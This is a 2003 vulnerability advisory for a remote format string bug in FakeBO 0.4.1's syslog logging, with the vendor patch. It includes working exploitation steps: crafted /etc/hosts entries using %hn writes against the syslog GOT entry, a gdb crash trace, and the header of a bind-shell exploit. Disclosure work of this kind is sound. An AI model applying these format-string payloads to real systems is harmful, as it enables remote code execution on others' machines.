Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team research@secnetops.com Team Lead Contact kf@secnetops.com Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-06-12-1212 Product : FakeBO server Version : <= 0.4.1 Vendor : http://sourceforge.net/projects/fakebo/ Class : Remote Criticality : Low Operating System(s) : *nix, cygwin High Level Explanation ************************************************************************ High Level Description : Remote format string issue in syslogprintf() What to do : Apply patch or disable syslog in the config Technical Details ************************************************************************ Proof Of Concept Status : Secure Network Operations does have PoC code Low Level Description : FakeBO could be considered a novelty program by now however in some situations there is potential that it could be used in some sort of novice honeypot type setup. It is also possible someone would think it was a good way to trick their office buddy that had installed the REAL BO on their PC earlier that week. Someone mentioned the possiblilty of this being used in a crude backdoor as well. Both cygwin binaries and unix source are available from the FakeBO website located at http://cvs.linux.hr/fakebo/. This issue can be triggered in both the linux and win32 versions. In order to be exploitable FakeBO must first be configured to use syslog() and the target must have the proper resolver library in place. Syslog could be turned on in the fakebo.conf as follows. # you can set this to 1 if you want to log connections via syslog # 0 - do not log via syslog # 1 - log via syslog # 2 - log via syslog verbosely logtosyslog 1 Due to possible resolver issues the chances of this bug being actively exploited are slim. The issues with the resolver can be explained at http://pi.cr.yp.to/ and http://cr.yp.to/djbdns/idn.html. If your bind allows the allow_special all or options no-check-names in /etc/resolv.conf you may be able to be exploited. In order to show the posibility for exploitation you simply use /etc/hosts as an example. This is the entry in /etc/hosts 127.0.0.1 ..AAAABBBB%10$x%11$x If we only make use of the console we would see this 04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x' (127.0.0.1) accepted! In syslog however we get more interesting output. Apr 9 15:37:18 vegeta FakeBO: [NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1) This would be an example of overwriting the syslog() function in order to exploit this issue. [dotslash@vegeta dotslash]$ objdump -R fakebo-0.4.1/fakebo|grep syslog 08051cd4 R_386_JUMP_SLOT syslog [root@vegeta dotslash]# echo -e "127.0.0.1 ..\xd6\x1c\x05\x08\xd4\x1c \x05\x08%10\$hn%11\$hn" > /etc/hosts (gdb) r -c /tmp/fakebo.conf Starting program: ~/fakebo-0.4.1/fakebo -c /tmp/fakebo.conf FakeBO version 0.4.1 Copyright (C) 1998,99 by KoSt Type `~/fakebo-0.4.1/fakebo -a' for details. 04-09-2003 19:48:06 FakeBO 0.4.1 started using PID 2591. 04-09-2003 19:48:25 [NB] Connection[#0] from `..??%10$hn%11$hn' (127.0.0.1) accepted! 04-09-2003 19:48:43 [NB][#0] Client disconnected. Program received signal SIGSEGV, Segmentation fault. 0x00240024 in ?? () If you wanted to take this simple example to the extreme... [dotslash@vegeta dotslash]$ head 0x82-fakebo_sux.c /* ** FakeBO v0.4.1 Proof of Concept exploit ** exploit by "you dong-hun"(Xpl017Elz), . ** ** bash-2.04# ./0x82-fakebo_sux -t1 ** [1] Make format string code. ** [2] Try localhost NetBUS port. ** [3] Make bind shellcode. ** [+] Waiting, execute shell. ** [*] Executed shell successfully ! ** ** Linux testsub 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown ** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys), ** 4(adm),6(disk),10(wheel) ** bash-2.04$ ** */ When being attacked in syslog you would see the following. ** 05-31-2003 18:48:55 FakeBO 0.4.1 started using PID 6996. ** 05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn' (127.0.0.1) accepted! ** 05-31-2003 18:49:06 [NB](#0): @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@... If however you were using an Immunix box (http://www.immunix.org) you would see the following. [root@Immunity kf]# ./0x82-fakebo_sux -t1 [1] Make format string code. [2] Try localhost NetBUS port. [3] Make bind shellcode. Broken pipe Note we did not get a shell... that would be FormatGuard working its magic. fakebo[6467]: ImmunixOS format error - mismatch of 0 in syslog() called by syslogprintf. Cheers go to the Immunix team for their work on the FormatGuard product. Patch or Workaround: Shortly after exploiting this issue on a non Immunix system I looked around to make sure this had not already been published. It turns out that someone on the FreeBSD team also noticed this sometime last year and wrote a patch. Fri Jun 7 01:16:21 2002 UTC (12 months ago) by kris - Fix a format string vulnerability which appears to be exploitable, and bump PORTREVISION. --- misc.c.orig Thu Jun 6 18:11:32 2002 +++ misc.c Thu Jun 6 18:11:41 2002 @@ -107,7 +107,7 @@ #ifdef HAVE_OPENLOG openlog("FakeBO", LOG_CONS, LOG_USER); - syslog(LOG_WARNING, buf); + syslog(LOG_WARNING, "%s", buf); closelog(); #else #warning "Can't find usable syslog, disabled!" Vendor Status : Vlatko Kosturjak aka KoSt was notified about the issue no updates to the sourceforge site or original home page have been made. A recompiled cygwin binary is not available from the Author at this time. Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.